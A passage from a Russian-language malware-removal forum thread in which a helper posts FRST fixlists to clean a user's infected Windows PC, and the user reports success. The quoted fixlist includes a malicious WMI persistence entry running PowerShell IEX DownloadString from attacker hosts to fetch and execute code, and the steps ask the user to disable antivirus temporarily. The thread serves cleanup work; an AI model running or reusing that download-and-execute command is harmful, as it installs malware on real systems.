SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Сделайте новые логи FRST. Fixlog.txt Addition.txt FRST.txt Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 6 января, 2020 Share Опубликовано 6 января, 2020 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: Task: {6A1EFD69-F39E-423B-8D1A-38CC263EB9CF} - \oka -> No File <==== ATTENTION 2020-01-06 20:37 - 2020-01-06 20:49 - 000000079 _____ C:\Windows\system32\ps 2020-01-06 20:37 - 2020-01-06 20:48 - 000000081 _____ C:\Windows\system32\s 2020-01-06 20:37 - 2020-01-06 20:48 - 000000077 _____ C:\Windows\system32\p ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Пробуйте установить антивирус. Ссылка на сообщение Поделиться на другие сайты
Larisa46 0 Опубликовано 7 января, 2020 Автор Share Опубликовано 7 января, 2020 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: Task: {6A1EFD69-F39E-423B-8D1A-38CC263EB9CF} - \oka -> No File <==== ATTENTION 2020-01-06 20:37 - 2020-01-06 20:49 - 000000079 _____ C:\Windows\system32\ps 2020-01-06 20:37 - 2020-01-06 20:48 - 000000081 _____ C:\Windows\system32\s 2020-01-06 20:37 - 2020-01-06 20:48 - 000000077 _____ C:\Windows\system32\p ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Пробуйте установить антивирус. Теперь все отлично, тормоза пропали. Антивирь встал нормально. Благодарю за помощь.+ в карму. Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения